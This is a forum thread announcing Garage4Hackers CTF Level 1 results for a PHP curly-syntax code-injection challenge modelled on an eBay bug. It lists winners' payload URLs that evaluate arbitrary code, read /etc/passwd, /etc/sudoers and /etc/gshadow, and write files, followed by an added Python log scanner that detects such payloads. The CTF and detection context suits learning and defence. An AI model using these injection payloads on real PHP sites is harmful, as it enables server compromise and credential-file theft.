Thread: Garage4Hackers CTF Web Level 1 challenge result

  1. #1

    Garage4Hackers CTF Web Level 1 challenge result

    The Garage4Hackers CTF Level 1 challenge came to life on 25th December, 2013 at 10:30 PM IST. It saw nice participation from across the globe, with some really creative attempts to crack the challenge. It took us some serious judging to filter out the top attempts. Finally we are done with it, and now we are pleased to announce the results of our Level 1 challenge!!

    The challenge was 54.197.234.66/index.php?wish=hohohoSanta:

    Try to execute simple PHP code or pwn the server, and try to update 54.197.234.66/updateme.txt.

    Also,

    safemode=on

    List of disabled functions:
    Code:
    dl,exec, passthru, shell_exec, system, proc_open, popen ,curl_exec, curl_multi_exec , parse_ini_file, show_source, url_exec, syslog, pcntl_alarm, pcntl_fork, pcntl_waitpid, pcntl_wait, pcntl_wifexited, pcntl_wifstopped, pcntl_wifsignaled ,pcntl_wexitstatus, pcntl_wtermsig, pcntl_wstopsig, pcntl_signal, pcntl_signal_dispatch, pcntl_get_last_error, pcntl_strerror, pcntl_sigprocmask, pcntl_sigwaitinfo, pcntl_sigtimedwait, pcntl_exec, pcntl_getpriority, pcntl_setpriority, allow_url_fopen, allow_url_include, stream_select
    Code:
    expose_php = Off
    display_errors = Off
    track_errors = Off
    html_errors = Off

    Vulnerability Description:

    I would like to give special thanks to David Vieira-Kurz (@secalert) for finding this awesome bug on eBay. This kind of vulnerability was less known until lately, when it shot into the limelight (http://www.secalert.net/2013/12/13/e...ode-execution/). We decided to base the Level 1 challenge on this vulnerability and tried to emulate the same flaw as in the case of eBay. For more details on the vulnerability, check the following blogs.
    Code:
    http://www.secalert.net/2013/12/13/ebay-remote-code-execution/
    http://gynvael.coldwind.pl/n/ebay_rce_analysis_wrong_question_mark

    Submissions from approximately 400 participants

    We saw approximately 400 individual participants looking to grab the prize. Payload attempts ranged from the blunt Nessus scanners to really cool “insert the coolest attack here” attacks.
    We have decided to release the total Apache log generated during the challenge. You can download it by emailing us. Top submissions are based on the best payload, and then on a 1st come 1st out basis in case of the same payload.

    Top submissions


    1. Xelenonz Lp.

    Code:
    http://54.197.234.66/index.php?wish[]=x
    
    http://54.197.234.66/index.php?wish={${phpinfo()}}
    
    http://54.197.234.66/index.php?wish={${highlight_file('./index.php')}}
    
    http://54.197.234.66/index.php?wish={${file_put_contents('updateme.txt','Xelenonz',FILE_APPEND)}};
    
    http://54.197.234.66/index.php?wish={${eval($_GET['code'])}}&code=file_put_contents('updateme.txt','Xelenonz',FILE_APPEND);
    
    http://54.197.234.66/index.php?wish={${print_r(glob("/tmp/*"))}}
    
    http://54.197.234.66/index.php?wish={${print_r(scandir($_GET['dir']))}}&dir=/tmp

    2. Pichaya Morimoto (LongCat)

    Code:
    http://54.197.234.66/index.php?wish={${readfile('/tmp/lnz')}}
    
    http://54.197.234.66/index.php?wish={${include('/tmp/lnz')}}
    
    http://54.197.234.66/index.php?wish={${print_r(stat("updateme.txt"))}}
    
    http://54.197.234.66/index.php?wish={${file_put_contents("/tmp/lnz",base64_decode("PD9waHAgcGhwaW5mbygpOyA/Pg=="))}}
    
    http://54.197.234.66/index.php?wish=/index.php?wish={${read_file('index.php')}}

    3. Mykola Ilin - solarwind [Defcon Ukraine]

    Code:
    http://54.197.234.66/index.php?wish=${include "/proc/cpuinfo"}
    
    http://54.197.234.66/index.php?wish=${include "/etc/passwd"}
    
    http://54.197.234.66/index.php?wish=${var_dump(glob("/proc/self/fd/*"))}
    
    http://54.197.234.66/index.php?wish=${var_dump(glob("/etc/*"))}
    
    http://54.197.234.66/index.php?/index.php?wish=${file_put_contents("updateme.txt","\\nsolarwind\\n",FILE_APPEND)}

    4. Pedro [tunelko]

    Code:
    http://54.197.234.66/index.php?wish=${var_dump(base64_decode('PD8gcGhwaW5mbygpOyBkaWUoKTs/Pg=='))}
    
    http://54.197.234.66/index.php?wish=${var_dump(file_get_contents('/etc/sudoers'))}
    
    http://54.197.234.66/index.php?wish=${var_dump(file_get_contents('/etc/gshadow'))}
    
    http://54.197.234.66/index.php?wish=${var_dump(ini_get('disable_functions'))}
    
    http://54.197.234.66/index.php?wish=${file_put_contents("updateme.txt","\nsolarwind\n",FILE_APPEND)}

    5. Nishant

    Code:
    54.197.234.66/index.php?wish={${phpinfo()}}
    
    54.197.234.66/index.php?wish={${file_put_contents('updateme.txt','nishant.dp@gmail.com at Thu, 26/12/2013 1:25AM IST')}}

    6. Bharadwaj Machiraju

    Code:
    54.197.234.66/index.php?wish={${phpinfo()}}
    
    http://54.197.234.66/index.php?wish=${file_put_contents("updateme.txt", "\ntunnelshade\n", FILE_APPEND)}

    7. Rahul Mali

    Code:
    54.197.234.66/index.php?wish={${phpinfo()}}
    54.197.234.66/index.php?wish={${fwrite(fopen("updateme.txt","a"),"Rahul%20Mali%20(rahulmali31415@gmail.com)")}}

    8. Piyush Pattanayak

    Code:
    54.197.234.66/index.php?wish={${phpinfo()}}
    
    54.197.234.66/index.php?wish=shoes({${file_put_contents('updateme.txt', 'Piyush Pattanayak', FILE_APPEND)}})

    -------------------------------------------------------------------------
    Note: Everyone tried to execute PHP curly syntax, as per our log information. However, we can also execute the PHP code in the following way.
    Code:
    http://54.197.234.66/index.php?wish=%22%2bphpinfo%28%29%2b%22
    http://54.197.234.66/index.php?wish=".phpinfo()."
    -------------------------------------------------------------------------


    AND THE WINNERS ARE

    Xelenonz Lp. and Solarwind



    Special thanks to all participants, and of course gear up for Level 2

    Thank you !
    [S]
    Last edited by [s]; 12-27-2013 at 07:44 PM.
    Garage4Hackers bugs for the community , of the community
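
A log-side check for the payload shapes listed in the post above, added here as an example (it is not Garage4Hackers' code and was not run on the real challenge log): it flags query parameters that open PHP curly syntax (`${`) or close a quoted string and concatenate a call, and lists the functions each request tried to invoke. The log lines, the documentation-range IP addresses and the names `scan_line` and `scan` are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache common/combined log prefix: client IP, request line, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (.*?) HTTP/[\d.]+" (\d{3})')

RULES = [
    # "${" opens PHP complex (curly) syntax: {${phpinfo()}} or ${include "..."}
    ("curly-syntax", re.compile(r'\$\{')),
    # A quote followed by "." or "+" and a call: ".phpinfo()." / "+phpinfo()+"
    ("string-breakout", re.compile(r'["\']\s*[.+]\s*[A-Za-z_]\w*\s*\(')),
]
CALL_RE = re.compile(r'([A-Za-z_]\w*)\s*\(')  # function names used in the value

def scan_line(line):
    """Return the findings for one access-log line (empty list if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    ip, _method, target, status = m.groups()
    findings = []
    # parse_qsl percent-decodes values, so %24%7B and ${ are treated alike.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        for rule, rx in RULES:
            if rx.search(value):
                findings.append({"ip": ip, "param": name, "rule": rule,
                                 "calls": CALL_RE.findall(value),
                                 "status": int(status)})
    return findings

def scan(lines):
    """Scan an iterable of log lines and return all findings in order."""
    return [f for line in lines for f in scan_line(line)]

# Constructed sample lines, not taken from the challenge log.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Dec/2013:22:41:03 +0530] "GET /index.php?wish=hohohoSanta HTTP/1.1" 200 512',
    '198.51.100.23 - - [25/Dec/2013:22:44:10 +0530] "GET /index.php?wish={${phpinfo()}} HTTP/1.1" 200 48211',
    '198.51.100.23 - - [25/Dec/2013:22:45:31 +0530] "GET /index.php?wish=%24%7Bvar_dump(ini_get(%27disable_functions%27))%7D HTTP/1.1" 200 901',
    '192.0.2.55 - - [25/Dec/2013:23:02:18 +0530] "GET /index.php?wish=%22.phpinfo().%22 HTTP/1.1" 200 48190',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The `calls` list is a triage aid: a hit whose calls include file-writing or `include`/`eval`-style functions and a 200 status deserves a look at the response size and at the files the request names.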


  2. #2
    And I thought, I was the only one to use curly syntax.

  3. #3
    Congratulations everyone! Great and neat efforts
    Hacking Wacking Sab Moh Maya Hai

  4. #4
    Heartiest Congratulations for your achievement Xelenonz Lp. and Solarwind
    Keep going

  5. #5
    Congrats, winners...

    How do I get to know whether any PHP site has this kind of vulnerability?

    Please tell me.

  6. #6
    Congratulations everyone!
